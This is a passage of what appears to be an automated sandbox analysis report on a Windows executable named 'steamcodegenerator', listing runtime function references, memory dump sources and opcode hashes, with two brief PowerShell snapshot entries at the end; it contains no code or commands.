                                                                                                                          • Opcode Fuzzy Hash: e056fb752b00353b83d650d62f1f17403a3bacc8c07260b3d954efaf1a3d08a7
                                                                                                                          • Instruction Fuzzy Hash: F781A622F14F4186FB10ABE5D8013FC6371AB547A8FA09235DF6D16BD6EF3891998350
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _set_statfp
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1156100317-0
                                                                                                                          • Opcode ID: c857c3327227c68747334663d00ca9331fa9479a74f52c20cdb4b2826f66a1e0
                                                                                                                          • Instruction ID: 7203bf62722d153dc80729fe80bb7216b973831593cc33c9fb74eb8a67ab0d82
                                                                                                                          • Opcode Fuzzy Hash: c857c3327227c68747334663d00ca9331fa9479a74f52c20cdb4b2826f66a1e0
                                                                                                                          • Instruction Fuzzy Hash: D1810B22B0CE6645F626BF76AD423FAF250BF45778FA44231E94E165D0DF3CA4C98620
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _set_statfp
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1156100317-0
                                                                                                                          • Opcode ID: 160c9c08bfc40915d9b2f250b4fe9603e2aa0f10eb61f97881b22bd1a26b2934
                                                                                                                          • Instruction ID: 7ff31445dc9228e01214b8ac0b183dc46476e45e24baeabd367cae7f11d190fb
                                                                                                                          • Opcode Fuzzy Hash: 160c9c08bfc40915d9b2f250b4fe9603e2aa0f10eb61f97881b22bd1a26b2934
                                                                                                                          • Instruction Fuzzy Hash: 23117F22E1CF2202FA5831A4EE563B592406F69374EE50330E6BE666D68F2CAE495134
                                                                                                                          APIs
                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF71C061CE7,?,?,00000000,00007FF71C061F82,?,?,?,?,?,00007FF71C061F0E), ref: 00007FF71C06A4F7
                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF71C061CE7,?,?,00000000,00007FF71C061F82,?,?,?,?,?,00007FF71C061F0E), ref: 00007FF71C06A516
                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF71C061CE7,?,?,00000000,00007FF71C061F82,?,?,?,?,?,00007FF71C061F0E), ref: 00007FF71C06A53E
                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF71C061CE7,?,?,00000000,00007FF71C061F82,?,?,?,?,?,00007FF71C061F0E), ref: 00007FF71C06A54F
                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF71C061CE7,?,?,00000000,00007FF71C061F82,?,?,?,?,?,00007FF71C061F0E), ref: 00007FF71C06A560
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Value
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3702945584-0
                                                                                                                          • Opcode ID: f3e7b6d242c1910f2b5591a4fcee400abd11717328fc635c98f7e7c632fcba31
                                                                                                                          • Instruction ID: e74243505194c41a60ee935cff9fa0f92b14cbae1278d6acff9cfeeb05a39978
                                                                                                                          • Opcode Fuzzy Hash: f3e7b6d242c1910f2b5591a4fcee400abd11717328fc635c98f7e7c632fcba31
                                                                                                                          • Instruction Fuzzy Hash: 3C116060F08E2241F958BBA66E521F9F2559F443B0EE45334E92E067D6DF2CE5894220
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Value
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3702945584-0
                                                                                                                          • Opcode ID: bd49efac836a00a7d6e6040a8177aeef1eacb3bc0844a01248e3808e30053e11
                                                                                                                          • Instruction ID: d21d2990399afb6e1ce6be681a493dfccf37cf4ecaca47bf55821516bc2fdd9c
                                                                                                                          • Opcode Fuzzy Hash: bd49efac836a00a7d6e6040a8177aeef1eacb3bc0844a01248e3808e30053e11
                                                                                                                          • Instruction Fuzzy Hash: 7211FB60F0DE2645F9587FE65D520F9B2458F45370EF45734EA2E0A2C2EF2CB5895230
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CallEncodePointerTranslator
                                                                                                                          • String ID: MOC$RCC
                                                                                                                          • API String ID: 3544855599-2084237596
                                                                                                                          • Opcode ID: 28528c47c0e47c61ea15e7d98c52d1fdbb12d4762e0c8dcc68e2cea472630b6c
                                                                                                                          • Instruction ID: 8c0771bad729981747ec79e055c13ebbf798d20ef28f3a0f1077a853f67190b1
                                                                                                                          • Opcode Fuzzy Hash: 28528c47c0e47c61ea15e7d98c52d1fdbb12d4762e0c8dcc68e2cea472630b6c
                                                                                                                          • Instruction Fuzzy Hash: 27919273A08B858AE710EBA4D8402EDBBB0F749798F604236EB8D17B55DF38D199C710
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                          • String ID: csm
                                                                                                                          • API String ID: 2395640692-1018135373
                                                                                                                          • Opcode ID: efb476289a48de47cc6c133713b57c80aca7b2cc6583d7a462300b28a4b57851
                                                                                                                          • Instruction ID: c7dcc2736ac20e6a7c3a8c76e0055693634793c0f1e027882bfeb38a45ffeec8
                                                                                                                          • Opcode Fuzzy Hash: efb476289a48de47cc6c133713b57c80aca7b2cc6583d7a462300b28a4b57851
                                                                                                                          • Instruction Fuzzy Hash: 5751B132A19B028BDF54EB55D8056B8B7A1EB44BA5FA08131DB4A47748DF3DE885C720
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CallEncodePointerTranslator
                                                                                                                          • String ID: MOC$RCC
                                                                                                                          • API String ID: 3544855599-2084237596
                                                                                                                          • Opcode ID: 8ff30341cfee721db4765e122103f5437cfdd667779e7ccbcb0684ed890b6ecf
                                                                                                                          • Instruction ID: b5cbb72af6d961c7800a05d1728be5f2a21217cf1d880c1bd07b8aff8c1df90d
                                                                                                                          • Opcode Fuzzy Hash: 8ff30341cfee721db4765e122103f5437cfdd667779e7ccbcb0684ed890b6ecf
                                                                                                                          • Instruction Fuzzy Hash: 23619232908B8586D720AF55E8403EAFBB0FB897A4F544225EB9C43B59DF7CD198CB10
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                          • String ID: csm$csm
                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                          • Opcode ID: d1a409f6a23794f2edf1c37610bd8a1d13082c0ad3cb85bcd98522ffa63453bc
                                                                                                                          • Instruction ID: dca516eae5cce23b0cb682747fd046e2583689602b47a9e6c76fbc5582ed8a25
                                                                                                                          • Opcode Fuzzy Hash: d1a409f6a23794f2edf1c37610bd8a1d13082c0ad3cb85bcd98522ffa63453bc
                                                                                                                          • Instruction Fuzzy Hash: AC51CA72908A8187EB34AF9599443B8BBB0FB48BA4F644235DB9C47B95CF3CE454C711
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                          • String ID: bad locale name
                                                                                                                          • API String ID: 2775327233-1405518554
                                                                                                                          • Opcode ID: 00736578c6eb0824a3dbfeb00187506f444d3a2b9fb46ce52c71a5bb71dfef5f
                                                                                                                          • Instruction ID: 6e3d1bcea5e8cfa92c093119c384d6224dd1bc2f2b7af200b4ab5a9f850fbb88
                                                                                                                          • Opcode Fuzzy Hash: 00736578c6eb0824a3dbfeb00187506f444d3a2b9fb46ce52c71a5bb71dfef5f
                                                                                                                          • Instruction Fuzzy Hash: 6D412932B0AA418AEB14EFF0D8902FC73B4AF44758F984834DB4D66A55DF39D51AD324
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2718003287-0
                                                                                                                          • Opcode ID: 5c4401886065423c6ff0b2da39cbcb580a1fa276b42842d1cd99b8de723316d1
                                                                                                                          • Instruction ID: b476f266ac825e32d3bdd499581b07234256d1281966e363c43be16fa8856fd6
                                                                                                                          • Opcode Fuzzy Hash: 5c4401886065423c6ff0b2da39cbcb580a1fa276b42842d1cd99b8de723316d1
                                                                                                                          • Instruction Fuzzy Hash: 50D1F232F08A9189E711DFA5D8442EC77B1FB547A8BA08235CE5E97B99DF38D40AC710
                                                                                                                          APIs
                                                                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71C06D3AF), ref: 00007FF71C06D4E0
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71C06D3AF), ref: 00007FF71C06D56B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ConsoleErrorLastMode
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 953036326-0
                                                                                                                          • Opcode ID: f4c598b794b2957f8221025396d44ea9ca5fd2ca3015efc81122515608aa3158
                                                                                                                          • Instruction ID: ca45522cecadd7866bafcf98d6f5d17ff35a6a932d7cbcaef52fa69983f4afde
                                                                                                                          • Opcode Fuzzy Hash: f4c598b794b2957f8221025396d44ea9ca5fd2ca3015efc81122515608aa3158
                                                                                                                          • Instruction Fuzzy Hash: 9891D762F08F6185F750AFA59C442FDBBA4BB047A8FA44135DE0E57A84DF38D489C721
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __except_validate_context_record
                                                                                                                          • String ID: csm$csm
                                                                                                                          • API String ID: 1467352782-3733052814
                                                                                                                          • Opcode ID: 932fa6e829df123efbcca097b2357dada1d6fbdb0e4c3a71699927478b386a7c
                                                                                                                          • Instruction ID: f1b7fd0d5cb99ed6dae679d25e89390a87b2007301d5d82dc4ba1dd9da2cca77
                                                                                                                          • Opcode Fuzzy Hash: 932fa6e829df123efbcca097b2357dada1d6fbdb0e4c3a71699927478b386a7c
                                                                                                                          • Instruction Fuzzy Hash: 5471B432608A9187DB60AF65D8407BDBBB0FB09BA4FA48235DB4D47A85CF3CD455C750
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                          • String ID: csm
                                                                                                                          • API String ID: 2558813199-1018135373
                                                                                                                          • Opcode ID: 6163656b69aba43e6f85f19a250a019f0052d4614d76d8c745b3035227ed82da
                                                                                                                          • Instruction ID: 59cacab1dbbe8012131e82b1ef8e7774732584538cdea6493a2840066b1e7a22
                                                                                                                          • Opcode Fuzzy Hash: 6163656b69aba43e6f85f19a250a019f0052d4614d76d8c745b3035227ed82da
                                                                                                                          • Instruction Fuzzy Hash: 5D517D72618B8287D620EB55E9412BEB7B4FB88BA0F600135DB8D07B55DF3CE495CB11
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                          • String ID: U
                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                          • Opcode ID: 018631f563cd5f86bf90a3ea0888df879cf18235863466e9cb65147d4980afc7
                                                                                                                          • Instruction ID: a3e2ffa80913f08dd48db0d1b226e5a249ac24ed2032dfd1c9c240fad86efbb2
                                                                                                                          • Opcode Fuzzy Hash: 018631f563cd5f86bf90a3ea0888df879cf18235863466e9cb65147d4980afc7
                                                                                                                          • Instruction Fuzzy Hash: 95419222B18B9592DB20AF65E8443E9B7A1FB98BA4FA44031EE4D87748DF3CD445C750
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                                                                                                                          • String ID: bad locale name
                                                                                                                          • API String ID: 1838369231-1405518554
                                                                                                                          • Opcode ID: bc46d9a1bc2a7d05830fd543c4d4717b0fcd6854d73d0bf546987af89fa682f9
                                                                                                                          • Instruction ID: 5194ab76a5e9dd0881720c592d74097ea817ea7220cf84ac2dd5204d541924a9
                                                                                                                          • Opcode Fuzzy Hash: bc46d9a1bc2a7d05830fd543c4d4717b0fcd6854d73d0bf546987af89fa682f9
                                                                                                                          • Instruction Fuzzy Hash: 51014F22505F818AC744EFB5BC40198B6B5FB58F98B685539CB8C8371AEF38C594C350
                                                                                                                          APIs
                                                                                                                          • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF71C0566AA), ref: 00007FF71C05AB6C
                                                                                                                          • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF71C0566AA), ref: 00007FF71C05ABAD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                                                          • String ID: csm
                                                                                                                          • API String ID: 2573137834-1018135373
                                                                                                                          • Opcode ID: 2cb8a78e00c36ca855e3f70bae74cf4a1d3c179b7e048d680593ed73b494d009
                                                                                                                          • Instruction ID: 7a9651f1416c495ec5b2abb18c6b34082047026098f9dbc9ca17d2645e90d308
                                                                                                                          • Opcode Fuzzy Hash: 2cb8a78e00c36ca855e3f70bae74cf4a1d3c179b7e048d680593ed73b494d009
                                                                                                                          • Instruction Fuzzy Hash: 1F115132A19F4182EB109B55F8002A9B7E5FB88BA4FA84230DBCC07B55EF3CD5558B40
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Facet_LockitLockit::~_Register
                                                                                                                          • String ID: @F
                                                                                                                          • API String ID: 2774363102-2348236604
                                                                                                                          • Opcode ID: 9d1408b99dfbbb19e9203b29269fb050f37ee393090f3ec43ea93e1dc3c37ed4
                                                                                                                          • Instruction ID: 7b30006210f9b64156428f2e945de61ed0d8c8b78a07c73ec43d799c0da86e0a
                                                                                                                          • Opcode Fuzzy Hash: 9d1408b99dfbbb19e9203b29269fb050f37ee393090f3ec43ea93e1dc3c37ed4
                                                                                                                          • Instruction Fuzzy Hash: D8E0C026608E0182DA10EF16F8510AAA360FB89BA4F985131EF8E07756CE3CD5958B50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2403345742.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_7ffd34780000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                          • Instruction ID: 7f6ce6d3950398a1a76d3f915621f5b787bedea6720724a7873ccae3b611ec43
                                                                                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                          • Instruction Fuzzy Hash: 4001677121CB0C8FD744EF0CE451AA9B7E0FB95365F10056DE58AC3651D636E881CB45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2672988975.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34770000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6efb35294084de576040f1d86bfe0149b3abb2efa9d2368e8eaac151240c5049
                                                                                                                          • Instruction ID: d5b88a77d1bf428322af5471db995a702bbfe8fa0c260f62aec700d8d6d349a0
                                                                                                                          • Opcode Fuzzy Hash: 6efb35294084de576040f1d86bfe0149b3abb2efa9d2368e8eaac151240c5049
